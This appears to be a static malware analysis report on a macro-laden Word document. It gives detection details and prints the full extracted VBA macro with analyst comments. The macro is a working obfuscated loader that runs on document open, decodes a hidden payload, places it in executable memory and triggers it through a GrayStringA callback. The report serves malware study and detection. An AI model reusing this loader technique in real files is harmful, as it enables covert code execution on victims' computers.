Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d2d786e373e96885…

MALICIOUS

Office (OLE)

172.5 KB Created: 2017-02-27 12:58:00 Authoring application: Microsoft Office Word First seen: 2017-03-05
MD5: 64804622a77cb0fc6c1af2e27d6132e6 SHA-1: b4ab887495b256f903f5b5facc7ab5e4e4040414 SHA-256: d2d786e373e968858e8a45118b20b744c621e10c84d5bbfddd0ff12841c5442b
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Dropper.ZwMacros-6057750-0, indicating it's a macro-based dropper. The presence of a Document_Open macro and a large VBA macro further supports this. The VBA script likely attempts to download and execute a secondary payload, a common technique for macro-based malware; note, however, that the extracted macro contains no URL of its own and instead declares NtAllocateVirtualMemory, ZwWriteVirtualMemory and GrayStringA, which points to a payload that is decoded by the macro itself (counterpunch.algid) and run in memory rather than fetched from the network.

Heuristics 4

  • ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Dim dysmeromorph As String
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All seven URLs below are XML/RDF namespace identifiers (Adobe XMP and W3C) found in the document body, typical of embedded image metadata; none of them appears in the extracted macro.
    • http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14106 bytes
SHA-256: 27262a621d01de01321b7dbb7893bc15e0bb6b0e6d13a5906e7b0416083e5c3a
Preview script
First 1,000 lines of the extracted script
' Module header attributes as emitted by olevba for the document's ThisDocument
' class module. VB_PredeclaredId = True and VB_Exposed = True are the usual
' values for a Word ThisDocument module; nothing in this header is unusual.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' impermissibly: the loader stage of this macro. Called only from Document_Open.
' Flow: read an obfuscated string from a control on the form module "zenaidura",
' decode it with counterpunch.algid, copy the result into executable memory via
' anarhichas, then transfer control into that memory through the GrayStringA
' callback (declared in counterpunch as motley). The SYD()/NPer() calls, the
' string concatenations and most numeric assignments produce values that are
' never read again; they are padding meant to look like ordinary business code.
Sub impermissibly()
Dim espagne As Byte
Dim atonicity As Long
' Page count of this document; only used to choose which item of the control is selected.
changing = ThisDocument.ComputeStatistics(Statistic:=wdStatisticPages)
' zenaidura.hireling: a control on the "zenaidura" form module (its attributes
' are at the end of the listing). Setting .Value = pages + 9 appears to select
' the item whose Name carries the encoded payload.
zenaidura.hireling.Value = changing + 9
' "necromancer" / "admiring": built but never used.
bellwether = "nec" & "romancer"
verba = "ad" & "miri" & "ng"
Set ny = zenaidura.hireling.SelectedItem
irishman = 2
malignant = 202
baccate = 25909
atrabilious = 465601
' SYD (sum-of-years-digits depreciation) result is never read: noise.
atrabilious = SYD(atrabilious, baccate, malignant, irishman)

' The encoded payload is the last 5844 characters of the selected item's Name.
excluded = ny.Name
boronic = 5844
hardworking = Right(excluded, boronic)
' Decode it (see counterpunch.algid: per-position un-shift, then base64).
audiometry = counterpunch.algid(hardworking)
insipid = 4
nolimetangere = 166
stuck = 17963
febrile = 237146
febrile = SYD(febrile, stuck, nolimetangere, insipid)

barriers = "co" & "njoin"
hearted = "etude"
' Pointer-sized locals: LongPtr under 64-bit Office, Long under 32-bit.
#If Win64 Then
Dim crossed As Byte
Dim walk As LongPtr
Dim cornish As LongPtr
Dim indetermination As Byte
#Else
Dim burnable As Variant
Dim cornish As Long
Dim mastotermitidae As String
Dim walk As Long
#End If
damselfish = 108 - 108
prospicience = "corydalidae"
electoral = 4096
muscicapidae = 8
isohel = 302
boulder = 36051
sliver = 414896
sliver = SYD(sliver, boulder, isohel, muscicapidae)

aberdevine = "pappus"
cynoscion = "adiantaceae"
saipan = 4
alimentary = 293
cnidaria = 12334
illconditioned = 417490
illconditioned = SYD(illconditioned, cnidaria, alimentary, saipan)

sapper = audiometry
digenesis = "meed"
' walk = base address of the executable region that now holds the decoded payload.
walk = anarhichas(sapper)
plaque = "seawan"
blossoming = "fixer"
' elflike is the entry offset into the payload: 108 + 31 + 71 + 1102 = 1312 on
' 64-bit, (93 + 115 + 287) + 2659 = 3154 on 32-bit. The string assignments in
' between are unused.
#If Win64 Then
Dim acceptor As String
Dim halogen As LongPtr
amulet = "gory"
florilegium = "dutifully"
stupefying = "corinthians"
Dim wishfulness As LongPtr
elflike = 108 + 31 + 71 + 1102
#Else
alibi = "metacenter"
oldbuck = "anguine"
Dim halogen As Long
scandalized = 93 + 115 + 287
Dim wishfulness As Long
elflike = scandalized + 2659

#End If
Dim strappado As String
Dim galley As Long
halogen = 0
' cornish = walk + elflike: the address that will be called.
cornish = walk + elflike
wishfulness = 45 - 44
' motley is GrayStringA; with wishfulness = 1 and halogen = 0 this is
' GrayStringA(1, 1, cornish, 0, 1, 0, 0, 0, 0). The third parameter is the
' lpOutputFunc callback that User32 invokes, so this call is what starts the
' payload. The return value is never inspected.
devitedness = motley(wishfulness, wishfulness, cornish, halogen, wishfulness, halogen, halogen, halogen, halogen)
comedietta = 6
antarctic = 360
gravel = 27248
achiever = 251932
achiever = SYD(achiever, gravel, antarctic, comedietta)

End Sub

' headerFooter: decoy. It is never called anywhere in the listing and would not
' even compile as written (myHeader is declared with the Sub's own name as its
' type). It resembles a snippet lifted from Office VBA documentation, included
' to make the module look like ordinary automation code.
Sub headerFooter()
    Dim myHeader As headerFooter
    Set myHeader = ActiveDocument.Sections(1).Headers _
        (wdHeaderFooterPrimary)
End Sub


' Document_Open: Word runs this automatically when the document is opened
' (the OLE_VBA_DOCOPEN heuristic above matched this procedure). Its only
' effective statement is the call to impermissibly; the Dims, the two string
' assignments and the SYD() call are filler.
Private Sub Document_Open()
Dim dysmeromorph As String
Dim cobblestone As Variant
napiers = "bilimbi"
thermionics = "approaching"
' Entry point of the loader chain.
impermissibly
overmeasure = 4
akimbo = 286
frequent = 54646
stayathome = 291421
stayathome = SYD(stayathome, frequent, akimbo, overmeasure)
End Sub
' anarhichas: allocate an executable buffer in the current process and copy the
' decoded payload into it. till is the decoded payload as returned by algid
' (an untyped parameter, so a ByRef Variant). Returns the base address of the
' allocated region; impermissibly later calls into it. Uses the counterpunch
' declarations ecclesiologist (NtAllocateVirtualMemory) and, through
' companionability, paleornithology (ZwWriteVirtualMemory).
Function anarhichas(till)
Dim alp As Variant
Dim apocalypse As Byte
Dim dubitation As String
Dim cryoscope As String
' abjectness = 26 - 84 + 93 - 27 = 8 on 64-bit, 11 - 36 + 29 = 4 on 32-bit:
' the size of a pointer. The other Dims in each branch are unused.
#If Win64 > 0 Then
Dim gag As Integer
Dim abbreviate As LongPtr
abjectness = 26 - 84 + 93 - 27
Dim folly As LongPtr
Dim peculiar As Integer
Dim arrows As String
Dim biogenesis As LongPtr
Dim fagus As Byte
#Else
Dim ruling As Byte
Dim abbreviate As Long
abjectness = 11 - 36 + 29
Dim folly As Long
Dim biograph As String
Dim biogenesis As Long
Dim fruiterer As Variant
Dim encounter As Byte
#End If
' Copy one pointer's worth of bytes from offset 8 of the VARIANT behind till
' (where a VARIANT's data union sits) into abbreviate, i.e. read the address
' of the payload bytes. ZwWriteVirtualMemory on the current process is used
' here as a plain memory copy, presumably to avoid a CopyMemory declaration.
brunnhilde = VarPtr(abbreviate)
dreams = companionability(brunnhilde, VarPtr(till) + 8, abjectness)
' NtAllocateVirtualMemory(ProcessHandle = -1 [current process],
'   BaseAddress = &folly (0 => let the kernel choose), ZeroBits = 0,
'   RegionSize = &9598, AllocationType = 4096 (MEM_COMMIT),
'   Protect = 64 (PAGE_EXECUTE_READWRITE)).
' On return folly holds the address of a writable and executable region.
ambulant = -1
folly = 0
missayingk = 0
biogenesis = 9598
stirringly = 4096
bees = 64
fraternally = ecclesiologist(ByVal ambulant, folly, ByVal missayingk, biogenesis, ByVal stirringly, ByVal bees)
' capybara / microcentrum: undeclared globals assigned noise values.
capybara = envenomed

microcentrum = Math.Round(81)

' ZwWriteVirtualMemory(current process, folly, abbreviate, 115 + 4269 = 4384 bytes):
' copies the decoded payload into the region allocated above.
companionability folly, abbreviate, 115 + 4269
cornucopia = 7
curtailed = 160
partitionist = 22163
gc = 526041
gc = SYD(gc, partitionist, curtailed, cornucopia)

' Return the base address of the payload in memory.
anarhichas = folly
End Function
' companionability: thin wrapper around paleornithology (ZwWriteVirtualMemory).
'   cannelloni        - destination address
'   sleepwalker       - source address
'   hypervitaminosis  - number of bytes to copy
' The process handle is fixed at sectarist = 40 - 41 = -1, i.e. the current
' process, so the call is effectively a memcpy performed by ntdll. No return
' value is set. Called twice by anarhichas: once to read the payload pointer
' out of a Variant, once to copy the payload into the executable region. The
' NPer() call and the envenomed/capybara/microcentrum/spreadeagleism
' assignments are noise.
Function companionability(cannelloni, sleepwalker, hypervitaminosis)
' Pointer-sized locals for each bitness; most are unused.
#If Win64 Then
Dim speakership As Variant
Dim cyma As Byte
Dim sectarist As LongPtr
Dim celt As LongPtr
Dim lavish As LongPtr
Dim adversative As String
Dim beggarmyneighbor As LongPtr
Dim buttonhole As LongPtr
#Else
Dim celt As Long
Dim matsyendra As Integer
Dim sectarist As Long
Dim battology As Variant
Dim beggarmyneighbor As Long
Dim devitalization As Integer
Dim lavish As Long
Dim jeu As Variant
Dim buttonhole As Long
Dim behindhand As String
Dim rung As String
#End If
envenomed = capybara
spreadeagleism = "adrenarche"
' celt = destination, buttonhole = byte count, beggarmyneighbor = source.
celt = cannelloni
buttonhole = hypervitaminosis
microcentrum = Math.Round(377)
beggarmyneighbor = sleepwalker
counterrevolution = 78
enclave = 23852
adsorbent = 136224
locally = NPer(37 / 637, counterrevolution, -29190, adsorbent, 1)

envenomed = "nonimitation"
' ZwWriteVirtualMemory(-1, celt, beggarmyneighbor, buttonhole, &lavish);
' lavish receives the number of bytes written and is never read.
sectarist = 40 - 41
paleornithology ByVal sectarist, celt, beggarmyneighbor, buttonhole, lavish
capybara = "spitz"
End Function


' Module "counterpunch": API declarations plus the decoder. Each Windows API is
' declared under a random dictionary-word name with an Alias giving the real
' export, once for 64-bit Office (PtrSafe / LongPtr) and once for 32-bit.
' Only three of the imports are ever called: NtAllocateVirtualMemory,
' ZwWriteVirtualMemory and GrayStringA. The Shell32 / Kernel32 / Shlwapi
' declarations are never referenced anywhere in the listing and appear to be
' padding that dilutes the import set. The song-lyric comments are filler.
Attribute VB_Name = "counterpunch"
'  Good Will Hunting, got up out of the hood
'  I been bumping Pink Floyd, all I wanted was my recording label deal
#If Win64 Then
'  Awesome, I guess that's awesome
'  Awesome, well let's go, awesome
' NtAllocateVirtualMemory: used by anarhichas to obtain a committed RWX region.
' Note "casket As LongPtr,infarctByVal As LongPtr": the missing space makes
' "infarctByVal" the parameter name, passed ByRef, which still lines up with the
' RegionSize pointer argument.
Public Declare PtrSafe Function ecclesiologist Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (abut As LongPtr, serine As LongPtr, ByVal casket As LongPtr,infarctByVal As LongPtr, analgesic As LongPtr, ByVal strokes As LongPtr) As LongPtr
'
'  Like I feel so awesome
' SHGetDesktopFolder: declared, never called.
Public Declare PtrSafe Function athene Lib "Shell32.dll" Alias "SHGetDesktopFolder" (sophistical As LongPtr)
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
' ZwWriteVirtualMemory: used (via companionability) as the memory-copy primitive.
' The Lib name carries trailing spaces ("Ntdll.dll  "), likely to defeat naive
' string matching on the DLL name; the loader tolerates it.
Public Declare PtrSafe Function paleornithology Lib "Ntdll.dll  " Alias "ZwWriteVirtualMemory" (ByVal petronel As Any, ByVal augmenting As Any, ByVal absinth As Any, ByVal adrenergic As Any, ByVal roach As Any) As LongPtr
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
' GrayStringA: its third parameter (lpOutputFunc) is a callback pointer that
' User32 invokes. impermissibly passes an address inside the payload buffer
' there, so this benign-looking GDI call is the execution trigger.
Public  Declare PtrSafe Function motley Lib "User32.dll" Alias "GrayStringA" ( ByVal aumbry As Any, ByVal behalf As Any, ByVal dracontium As Any, ByVal transduction As Any, ByVal inconclusiveness As Any, ByVal foliated As Any, ByVal attract As Any, ByVal coffee As Any, ByVal odorless As Any) As Long
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
' SHGetSettings: declared, never called.
Public Declare PtrSafe Function arithmetically Lib "Shell32.dll" Alias "SHGetSettings" (appendicitis As LongPtr,dolorous As LongPtr) As LongPtr
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
' ReadConsoleW: declared, never called.
Public Declare PtrSafe Function auxesis Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal eidoloclast As LongPtr,animadvert As LongPtr,absentee As LongPtr,molucella As LongPtr,glossarist As LongPtr) As Boolean
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
' SHChangeNotification_Lock: declared, never called.
Public Declare PtrSafe Function lionhearted Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (asbestos As LongPtr, bgirl As Any,dubiety As LongPtr, boxwood As Any) As Boolean
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
' PathFileExists: declared, never called.
Public Declare PtrSafe Function desecrating Lib "Shlwapi.dll" Alias "PathFileExists" (nightwork As LongPtr) As LongPtr
'  Awesome, well let's go, awesome
'  Gator on my shirt, what did it Lacoste him

'  That's a side smiley face cause I'mma make the best of it
'  Two thumbs up, you gon point em at this guy
' 32-bit variants of the same declarations (Long instead of LongPtr, no PtrSafe).
#Else
'  Awesome, I guess that's awesome
'  That's why I can walk up into any restaurant and close the whole thing
' SHGetSettings: declared, never called.
Public Declare Function basel Lib "Shell32.dll" Alias "SHGetSettings" (auld As Long, paleface As Long) As Long
'
'  Death proof ride with Rosario Dawson
' ReadConsoleW: declared, never called.
Public Declare Function regretted Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal blahs As Long, pallbearer As Long, nonexploratory As Long, bacteriological As Long, wrongly As Long) As Boolean
'  Wanna roll
'
' GrayStringA: execution trigger (see the 64-bit declaration above).
Public Declare Function motley Lib "User32.dll" Alias "GrayStringA" (ByVal scorched As Any, ByVal orchestrated As Any, ByVal entendu As Any, ByVal affiance As Any, ByVal curate As Any, ByVal bounty As Any, ByVal sourbread As Any, ByVal carcharhinidae As Any, ByVal cantharides As Any) As Long
'
'  I assume you should make room for the elephant
' NtAllocateVirtualMemory: RWX allocation; same "penchantByVal" spacing quirk as
' the 64-bit form.
Public Declare Function ecclesiologist Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (gluttonous As Long, appositively As Long, ByVal pomade As Long, penchantByVal As Long, sandpapery As Long, ByVal registrant As Long) As Long
'  Semi colon dash parenthesis, text messaging
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
' SHGetDesktopFolder: declared, never called.
Public Declare Function haloragidaceae Lib "Shell32.dll" Alias "SHGetDesktopFolder" (autoeroticism As Long)
'  Awesome, I guess that's awesome
'  Good Will Hunting, got up out of the hood
' ZwWriteVirtualMemory: memory-copy primitive; trailing spaces in the Lib name again.
Public Declare Function paleornithology Lib "Ntdll.dll   " Alias "ZwWriteVirtualMemory" (ByVal tangency As Any, ByVal indoor As Any, ByVal davus As Any, ByVal mao As Any, ByVal bight As Any) As Long
'  Awesome, well let's go, awesome
'  See even G couldn't F with it
' SHChangeNotification_Lock: declared, never called.
Public Declare Function animate Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (incinerate As Long, fucus As Any, adjective As Long, atmospheric As Any) As Boolean
'  Awesome, well let's go, awesome
'  See even G couldn't F with it
' PathFileExists: declared, never called.
Public Declare Function insensitively Lib "Shlwapi.dll" Alias "PathFileExists" (climatic As Long) As Long
'  Awesome, well let's go, awesome
'  See even G couldn't F with it

'  Awesome, well let's go, awesome
'  See even G couldn't F with it
#End If
'  Awesome, well let's go, awesome
'  See even G couldn't F with it
' miscreance: returns the Unicode code point of the first character of
' shrinkable (plain AscW). Not called anywhere in the listing.
Function miscreance(shrinkable)
miscreance = AscW(shrinkable)
End Function
' naturalized: a tiny operator dispatcher used by algid so that the decoder's
' arithmetic does not appear inline. descendant selects the operation:
'   26 -> integer division (regal \ porgy)
'   36 -> bitwise And
'   44 -> multiplication
' Any other selector leaves the return value at its default (Empty).
Function naturalized(regal, porgy, descendant)
Select Case descendant
Case 26
naturalized = regal \ porgy
Case 36
naturalized = regal And porgy
Case 44
naturalized = regal * porgy
End Select
End Function
' tableSel: decoy. Never called anywhere in the listing; references a document
' "Log.doc" and a variable tempRange that is never declared. Like headerFooter
' it resembles an Office VBA documentation snippet used as camouflage.
Sub tableSel()
    Dim tempTable
    Documents("Log.doc").Tables(1).Select
    Set tempTable = Selection.Tables(1).Range
    tempRange.Tables(2).Select
End Sub


' miter: builds the standard base64 reverse-lookup table as a 256-entry Byte
' array indexed by ASCII code:
'   'A'..'Z' (65..90)  -> 0..25
'   '0'..'9' (48..57)  -> 52..61
'   'a'..'z' (97..122) -> 26..51
'   '/' (47)           -> 63
'   '+' (43)           -> 62
' Every other entry stays 0. Used by algid as ascospore.
Function miter()
Dim holonymy(255) As Byte
' 10 - 84 + 1 + 138 = 65 ('A').
acrosstheboard = 10 - 84 + 1 + 138
Do
holonymy(acrosstheboard) = acrosstheboard - 65
acrosstheboard = acrosstheboard + 1
Loop Until acrosstheboard = 91
' '0'..'9': value = code + 4 (48 -> 52).
acrosstheboard = 48
Do
holonymy(acrosstheboard) = acrosstheboard + 4
acrosstheboard = acrosstheboard + 1
Loop Until acrosstheboard = 58
' 'a'..'z': value = code - 71 (97 -> 26).
acrosstheboard = 97
Do
holonymy(acrosstheboard) = acrosstheboard - 71
acrosstheboard = acrosstheboard + 1
Loop Until acrosstheboard = 123
' '/' -> 63, '+' -> 62.
holonymy(47) = 63
acrosstheboard = 43
holonymy(acrosstheboard) = 62
miter = holonymy
End Function
' algid: decode the payload string. negligable is the 5844-character string
' impermissibly cut from the form control's item name. Two stages:
'   1. convert it to an ANSI byte array, then add 18 to every even-indexed byte
'      and 17 to every odd-indexed byte (cinderwench = 2 + Sqr(RGB(0, 1, 0))
'      = 2 + Sqr(256) = 18), undoing a per-position shift applied when the
'      sample was built;
'   2. plain base64 decoding using the alphabet table from miter: four input
'      characters -> one 24-bit value -> three output bytes, written into slew.
' 5844 characters yield 4383 bytes; slew has 6966 entries so the tail stays
' zero. The Byte array is returned through a String return type, which VBA
' fills byte for byte, so the caller receives the raw decoded bytes. The
' SYD/NPer/Rnd calls, chlorotic, envenomed/capybara/microcentrum and the many
' unused Dims and constants are padding.
Function algid(negligable) As String
Dim poetic As Integer
Dim amor(63) As Long
Dim circumambulation() As Byte
Dim sauropod As Long
Dim manliness As Long

Dim arginine As Byte

Dim piacere(63) As Long
Dim cambarus As Integer

Dim sclerotomy As Long
envenomed = "appris"

Dim ordeal As Long
Dim trifle(63) As Long
Dim slew(6965) As Byte
Dim flatfish As Long
microcentrum = Rnd(143)

chlorotic = chlorotic \ 315

Dim prosaist As String
Dim materiel As Variant

' Decoder constants (the arithmetic just hides the literals):
'   playwright = 65536 (2^16), malign = 4096 (64^2), honeymouthed = 256,
'   illapse = 262144 (64^3), cryogen = &HFF0000, hygre = 64, drift = 65280
'   (&HFF00), unwiped = 255. maladroit, embalmment, puffingl, sobbing, ute and
'   aeschynanthus are never read.
playwright = 65536
malign = 75 - 54 + 4075
honeymouthed = 75 - 101 - 39 + 321
illapse = 262144
Dim nile As Long

Dim famotidine As String

cryogen = 16711680
hygre = 64 - 102 + 102
maladroit = 16515072
drift = 25 - 81 - 122 + 65458
unwiped = 255
embalmment = 42 - 11 + 6 + 3995
Dim makeweight As Byte

puffingl = 104 + 257944
sobbing = 63
Dim mandrel As Byte
ute = 19 - 19
aeschynanthus = 5843
Dim bendable() As Byte
Dim thimblerigger As Variant
' Stage 1: the input string as single-byte characters.
bendable = VBA.Strings.StrConv(negligable, vbFromUnicode)
Dim compassionate As Long
watchett = 2
cashew = 191
hitler = 26757
silkworm = 571787
silkworm = SYD(silkworm, hitler, cashew, watchett)

' Un-shift: indices 0..5843, +18 on even positions, +17 on odd positions.
gromwell = 5843
cinderwench = 2 + Sqr(RGB(0, 1, 0))
For octopod = 0 To gromwell
If octopod Mod 2 = 0 Then
bendable(octopod) = bendable(octopod) + cinderwench
Else
bendable(octopod) = bendable(octopod) + cinderwench - 1
End If
Next octopod
arthrospore = 94
every = 35511
acutely = 167749
gritty = NPer(48 / 534, arthrospore, -5628, acutely, 1)

poetic = 0
chlorophyll = 44 - 81 + 37
acidulate = 43
' ascospore: base64 reverse lookup table (see miter).
ascospore = miter
' Weight tables for the four sextets of a base64 group (naturalized(..., 44)
' multiplies): amor(i) = i * 64, piacere(i) = i * 4096, trifle(i) = i * 262144.
For sclerotomy = 0 To 63
amor(sclerotomy) = naturalized(sclerotomy, hygre, 44)
piacere(sclerotomy) = naturalized(sclerotomy, malign, 44)
trifle(sclerotomy) = naturalized(sclerotomy, illapse, 44)
Next sclerotomy
burgoyne = 75
narrowness = 27068
zeta = 223199
kura = NPer(32 / 536, burgoyne, -4664, zeta, 1)

circumambulation = bendable
owlish = 121 - 90 - 83 + 56
airport = 48
harry = 28786
adnexa = 121286
footlocker = NPer(40 / 787, airport, -39772, adnexa, 1)

' illdisposed = 3: offset of the fourth character of each group.
illdisposed = 86 + 120 - 4 - 199
capybara = envenomed

envenomed = envenomed

usefully = illdisposed + 1
' adventurous = 2: offset of the third output byte of each group.
adventurous = 17 - 15
' Stage 2: base64 decode. flatfish advances by 3 in the body plus 1 at Next,
' i.e. one group of four characters per iteration; sauropod advances by 3.
For flatfish = 0 To gromwell
barred = circumambulation(flatfish)
irresolution = circumambulation(flatfish + 2)
' ordeal = t[c0] * 262144 + t[c1] * 4096 + t[c2] * 64 + t[c3]  (24-bit group).
ordeal = trifle(ascospore(barred)) _
 + piacere(ascospore(circumambulation(flatfish + 1))) + amor(ascospore(irresolution)) + ascospore(circumambulation(flatfish + illdisposed))
' slew(s)     = (ordeal And &HFF0000) \ 65536
' slew(s + 1) = (ordeal And &HFF00) \ 256
' slew(s + 2) =  ordeal And &HFF
sclerotomy = naturalized(ordeal, cryogen, 36)
slew(sauropod) = naturalized(sclerotomy, playwright, 26)
sclerotomy = naturalized(ordeal, drift, 36)
slew(sauropod + 1) = naturalized(sclerotomy, honeymouthed, 26)
slew(sauropod + adventurous) = naturalized(ordeal, unwiped, 36)
sauropod = sauropod + adventurous + 1
flatfish = flatfish + 3
Next
algid = slew
End Function



' Module "zenaidura": the form module that impermissibly reads through
' zenaidura.hireling. The VB_Base GUID pair together with VB_PredeclaredId =
' True is what a UserForm module carries. The form's control data (and with it
' the encoded payload string in the selected item's Name) is not part of this
' VBA source preview, so the payload itself does not appear in the listing.
Attribute VB_Name = "zenaidura"
Attribute VB_Base = "0{8988B926-E392-4E7F-A538-BB4D114C1CF8}{33336EA4-8230-40D2-A667-4FE1D521C8E6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False